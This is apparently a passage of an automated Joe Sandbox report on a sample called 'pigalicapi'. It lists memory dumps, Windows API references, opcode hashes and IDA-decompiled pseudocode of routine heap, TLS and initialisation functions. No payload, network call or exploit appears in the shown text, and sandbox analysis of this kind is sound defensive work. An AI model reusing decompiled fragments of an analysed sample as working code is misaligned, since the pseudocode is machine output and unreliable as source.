                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(0000007E), ref: 1000223B
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(0000000E), ref: 1000228B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$HugeRead
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 100728148-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
                                                                                                                                                                                                                                                                                                        • Instruction ID: 133c763f371e93ed1e981491a31024dabb451d2fe405ffdb26697d1a1c2a5393
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd318f91544f178069688045f5b296fb20421188c60a54711fd69487c4a0a276
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3301C975A01149EFEB04DF94C985B9EBBB5EF48354F208298E909AB255C734EF40DBA0
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TlsAlloc.KERNEL32(?,?,?,?,00A52548,004102E5,?,?,FFFFFFFF,0041032C), ref: 0040FCAE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Alloc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2773662609-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 1d68505a4d2c2be1fd6997ff3538c2e8bada1c9bb70ca8cacadf71cbb6f6cc32
                                                                                                                                                                                                                                                                                                        • Instruction ID: 42ba0e2f8ca25937b9577218f0e8f1747412e3c7344b5913d50b7ca6b605e0fe
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d68505a4d2c2be1fd6997ff3538c2e8bada1c9bb70ca8cacadf71cbb6f6cc32
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3DF0AFB0204305AFD730AFB6E94520A7AE0BB44304F85893EE99567791D778540ADB9E
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E97C0(void* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                                                                                                                        				char _t6;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                        					_t6 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                                                                                                                                                                        					return _t6;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t3;
                                                                                                                                                                                                                                                                                                        			}





                                                                                                                                                                                                                                                                                                        0x024e97c7
                                                                                                                                                                                                                                                                                                        0x024e97d6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e97d6
                                                                                                                                                                                                                                                                                                        0x024e97dd

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 024E97CF
                                                                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 024E97D6
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d2d76d143d232da7be93a88aa1c8ae047abdec23a224075daf2f12cf4052c050
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7fb6e0992bd364820f1863aacb19fde10be1dac2ade9dfd37b4dc93c3663d17d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2d76d143d232da7be93a88aa1c8ae047abdec23a224075daf2f12cf4052c050
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7C01271440608EBEF049ED4D44DBA5375CA704206F044403F60D89591C7709594CB51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 11c03190e962a3336078bc9f9bd4b39e56c7c2d924a363fb5b6bd62e4403c688
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9a935b580d19b4844a8e347fe3f337539f3ef189ba2f3eb9209136ab9bdebf7b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11c03190e962a3336078bc9f9bd4b39e56c7c2d924a363fb5b6bd62e4403c688
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3313DB0204301DFD720EF65E54435ABBE0BB40708F518C7ED8859B792D7BD9889DB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: f19e27de350e72c2be21b91eb14c2c843b9591aa7770d22e79dbda54baac12c1
                                                                                                                                                                                                                                                                                                        • Instruction ID: b4ea5088bbc2e04cae5ca264721ad58746302421d82bc6471c19b5581d7aa8aa
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f19e27de350e72c2be21b91eb14c2c843b9591aa7770d22e79dbda54baac12c1
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10311EB0608301DEE720EF61D59031ABAF4AB40344F44C83E9985AB695D7BC944ADF6A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8f4ecb97985d5e8621b4f5fb532634e6274162181c58748ea6569eeff33a15e4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8f230ea85c0c82a46ce4fe9d3adae6cb5bbcd7638e6efd245ab957bab051541
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6418574A04109AFEB44CF44D494BEAB7B2FB88394F24C15AEC195B359D775EE82CB80
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                                        			E00415890(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                                                                                                                        				signed int _t47;
                                                                                                                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t62;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t63;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t64;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t54 = __ecx;
                                                                                                                                                                                                                                                                                                        				E00412210(); // executed
                                                                                                                                                                                                                                                                                                        				_t32 = E00415320(_a4, _t54);
                                                                                                                                                                                                                                                                                                        				if(_t32 == 0) {
                                                                                                                                                                                                                                                                                                        					_t63 =  *_a4;
                                                                                                                                                                                                                                                                                                        					_t35 = E00414E80(_t63);
                                                                                                                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                                                                                                                        					_t53 = _t35;
                                                                                                                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                                                                                                                        						__eflags =  *(_t63 + 8);
                                                                                                                                                                                                                                                                                                        						if( *(_t63 + 8) != 0) {
                                                                                                                                                                                                                                                                                                        							L12:
                                                                                                                                                                                                                                                                                                        							 *_t64 = _t63 + 8;
                                                                                                                                                                                                                                                                                                        							InterlockedIncrement(??);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t55 =  *(_t63 + 0x10);
                                                                                                                                                                                                                                                                                                        							_t40 =  *(_t63 + 0xc);
                                                                                                                                                                                                                                                                                                        							__eflags = _t55;
                                                                                                                                                                                                                                                                                                        							if(_t55 > 0) {
                                                                                                                                                                                                                                                                                                        								_t40 = _t40 - _t55;
                                                                                                                                                                                                                                                                                                        								__eflags = _t40;
                                                                                                                                                                                                                                                                                                        								 *(_t63 + 0xc) = _t40;
                                                                                                                                                                                                                                                                                                        								 *(_t63 + 0x10) = 0;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							__eflags = _t40;
                                                                                                                                                                                                                                                                                                        							if(_t40 <= 0) {
                                                                                                                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								 *(_t63 + 0x10) =  ~_t40;
                                                                                                                                                                                                                                                                                                        								_t62 = _t63 + 0x18;
                                                                                                                                                                                                                                                                                                        								_v40 = E00414F10;
                                                                                                                                                                                                                                                                                                        								_v36 = _t63;
                                                                                                                                                                                                                                                                                                        								_v32 =  *((intOrPtr*)(E00411E50()));
                                                                                                                                                                                                                                                                                                        								asm("mfence");
                                                                                                                                                                                                                                                                                                        								 *((intOrPtr*)(E00411E50())) =  &_v40;
                                                                                                                                                                                                                                                                                                        								asm("mfence");
                                                                                                                                                                                                                                                                                                        								_v48 = _t63 + 0x1c;
                                                                                                                                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                                                                                                                                        									_v56 = _t62;
                                                                                                                                                                                                                                                                                                        									 *_t64 = _v48;
                                                                                                                                                                                                                                                                                                        									_t47 = E00416A70(__eflags);
                                                                                                                                                                                                                                                                                                        									__eflags = _t47;
                                                                                                                                                                                                                                                                                                        									if(_t47 != 0) {
                                                                                                                                                                                                                                                                                                        										break;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									__eflags =  *(_t63 + 0x10);
                                                                                                                                                                                                                                                                                                        									if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                                        										 *((intOrPtr*)(E00411E50())) = _v32;
                                                                                                                                                                                                                                                                                                        										 *(_t63 + 0xc) = 0;
                                                                                                                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L13;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v48 = _t47;
                                                                                                                                                                                                                                                                                                        								 *((intOrPtr*)(E00411E50())) = _v32;
                                                                                                                                                                                                                                                                                                        								 *_t64 = _v36;
                                                                                                                                                                                                                                                                                                        								_v40();
                                                                                                                                                                                                                                                                                                        								_t53 = _v48;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                                                                                                                        					return E00414F30(_a4, _t53, _t53, _t63);
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					return _t32;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}





















                                                                                                                                                                                                                                                                                                        0x00415890
                                                                                                                                                                                                                                                                                                        0x00415899
                                                                                                                                                                                                                                                                                                        0x004158a1
                                                                                                                                                                                                                                                                                                        0x004158a8
                                                                                                                                                                                                                                                                                                        0x004158b5
                                                                                                                                                                                                                                                                                                        0x004158b9
                                                                                                                                                                                                                                                                                                        0x004158be
                                                                                                                                                                                                                                                                                                        0x004158c0
                                                                                                                                                                                                                                                                                                        0x004158c2
                                                                                                                                                                                                                                                                                                        0x004158cb
                                                                                                                                                                                                                                                                                                        0x004158cd
                                                                                                                                                                                                                                                                                                        0x00415971
                                                                                                                                                                                                                                                                                                        0x00415974
                                                                                                                                                                                                                                                                                                        0x00415977
                                                                                                                                                                                                                                                                                                        0x004158d3
                                                                                                                                                                                                                                                                                                        0x004158d3
                                                                                                                                                                                                                                                                                                        0x004158d6
                                                                                                                                                                                                                                                                                                        0x004158d9
                                                                                                                                                                                                                                                                                                        0x004158db
                                                                                                                                                                                                                                                                                                        0x004158dd
                                                                                                                                                                                                                                                                                                        0x004158dd
                                                                                                                                                                                                                                                                                                        0x004158df
                                                                                                                                                                                                                                                                                                        0x004158e2
                                                                                                                                                                                                                                                                                                        0x004158e2
                                                                                                                                                                                                                                                                                                        0x004158e9
                                                                                                                                                                                                                                                                                                        0x004158eb
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x004158f1
                                                                                                                                                                                                                                                                                                        0x004158f3
                                                                                                                                                                                                                                                                                                        0x004158f6
                                                                                                                                                                                                                                                                                                        0x004158f9
                                                                                                                                                                                                                                                                                                        0x00415900
                                                                                                                                                                                                                                                                                                        0x0041590a
                                                                                                                                                                                                                                                                                                        0x0041590d
                                                                                                                                                                                                                                                                                                        0x00415918
                                                                                                                                                                                                                                                                                                        0x0041591d
                                                                                                                                                                                                                                                                                                        0x00415920
                                                                                                                                                                                                                                                                                                        0x0041592c
                                                                                                                                                                                                                                                                                                        0x0041592f
                                                                                                                                                                                                                                                                                                        0x00415933
                                                                                                                                                                                                                                                                                                        0x00415936
                                                                                                                                                                                                                                                                                                        0x0041593b
                                                                                                                                                                                                                                                                                                        0x0041593d
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00415928
                                                                                                                                                                                                                                                                                                        0x0041592a
                                                                                                                                                                                                                                                                                                        0x00415968
                                                                                                                                                                                                                                                                                                        0x0041596a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0041592a
                                                                                                                                                                                                                                                                                                        0x0041593f
                                                                                                                                                                                                                                                                                                        0x0041594a
                                                                                                                                                                                                                                                                                                        0x0041594f
                                                                                                                                                                                                                                                                                                        0x00415952
                                                                                                                                                                                                                                                                                                        0x00415958
                                                                                                                                                                                                                                                                                                        0x00415958
                                                                                                                                                                                                                                                                                                        0x004158eb
                                                                                                                                                                                                                                                                                                        0x004158cd
                                                                                                                                                                                                                                                                                                        0x00415980
                                                                                                                                                                                                                                                                                                        0x00415991
                                                                                                                                                                                                                                                                                                        0x004158aa
                                                                                                                                                                                                                                                                                                        0x004158b1
                                                                                                                                                                                                                                                                                                        0x004158b1

                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: a2bd1cefeceeada203d1a88774c59cc1db89744ccd2cbebff13c81639432a2fb
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7064b4f85ec8c943a007a1c63ca079293348c6aff3994ae5daf0d86751bc83bd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2bd1cefeceeada203d1a88774c59cc1db89744ccd2cbebff13c81639432a2fb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6310AB4A00705CFDB10EFAAD4405DEBBF4EF88354B00892AE956D7711E738A945CFA9
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                                        			E004111D0(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                                                                                                                        				char* _v36;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                                                                                                                        				char* _v56;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                                                                                                                                        				char* _t18;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t36;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                                                                                                                        				char* _t42;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t44;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t46;
                                                                                                                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t48;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t16 = 0x16;
                                                                                                                                                                                                                                                                                                        				_t48 = _t47 - 0x2c;
                                                                                                                                                                                                                                                                                                        				_t36 = _a4;
                                                                                                                                                                                                                                                                                                        				_t41 =  *_t36;
                                                                                                                                                                                                                                                                                                        				if(_a8 != 0) {
                                                                                                                                                                                                                                                                                                        					_t16 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t41 != 1) {
                                                                                                                                                                                                                                                                                                        						_t18 = E0040F1C0(_t36, __ecx);
                                                                                                                                                                                                                                                                                                        						_t3 = _t18 + 4; // 0x4
                                                                                                                                                                                                                                                                                                        						_t46 = _t3;
                                                                                                                                                                                                                                                                                                        						_t42 = _t18;
                                                                                                                                                                                                                                                                                                        						 *_t48 = _t46;
                                                                                                                                                                                                                                                                                                        						E00413FD0();
                                                                                                                                                                                                                                                                                                        						_t44 =  *_t36;
                                                                                                                                                                                                                                                                                                        						if(_t44 == 0) {
                                                                                                                                                                                                                                                                                                        							_v40 = 0x40f4b0;
                                                                                                                                                                                                                                                                                                        							_v36 = _t42;
                                                                                                                                                                                                                                                                                                        							_t9 = E004102F0(_t36, _t37, _t41, _t42, _t44) + 0xc; // 0xc
                                                                                                                                                                                                                                                                                                        							_t22 =  ==  ? _t44 : _t9;
                                                                                                                                                                                                                                                                                                        							_t23 =  *((intOrPtr*)( ==  ? _t44 : _t9));
                                                                                                                                                                                                                                                                                                        							_v32 =  *((intOrPtr*)( ==  ? _t44 : _t9));
                                                                                                                                                                                                                                                                                                        							asm("mfence");
                                                                                                                                                                                                                                                                                                        							_t11 = E004102F0(_t36, _t9, _t41, _t42, _t44) + 0xc; // 0xc
                                                                                                                                                                                                                                                                                                        							_t26 =  ==  ? _t44 : _t11;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)( ==  ? _t44 : _t11)) =  &_v40;
                                                                                                                                                                                                                                                                                                        							asm("mfence");
                                                                                                                                                                                                                                                                                                        							_a8();
                                                                                                                                                                                                                                                                                                        							_t14 = E004102F0(_t36,  &_v40, _t41, _t42, _t44) + 0xc; // 0xc
                                                                                                                                                                                                                                                                                                        							_t37 = _t14;
                                                                                                                                                                                                                                                                                                        							_t45 =  !=  ? _t14 : _t44;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)( !=  ? _t14 : _t44)) = _v32;
                                                                                                                                                                                                                                                                                                        							 *_t36 = 1;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							if(_t44 != 1) {
                                                                                                                                                                                                                                                                                                        								_v48 = _t44;
                                                                                                                                                                                                                                                                                                        								_v52 = _t36;
                                                                                                                                                                                                                                                                                                        								_v56 = " once %p is %d\n";
                                                                                                                                                                                                                                                                                                        								 *_t48 = __imp___iob + 0x40;
                                                                                                                                                                                                                                                                                                        								fprintf(??, ??);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						 *_t48 = _t46;
                                                                                                                                                                                                                                                                                                        						E00413A00(_t37);
                                                                                                                                                                                                                                                                                                        						E0040F340(_t42);
                                                                                                                                                                                                                                                                                                        						_t16 = 0;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t16;
                                                                                                                                                                                                                                                                                                        			}






















                                                                                                                                                                                                                                                                                                        0x004111d0
                                                                                                                                                                                                                                                                                                        0x004111d1
                                                                                                                                                                                                                                                                                                        0x004111d9
                                                                                                                                                                                                                                                                                                        0x004111e0
                                                                                                                                                                                                                                                                                                        0x004111e6
                                                                                                                                                                                                                                                                                                        0x004111e8
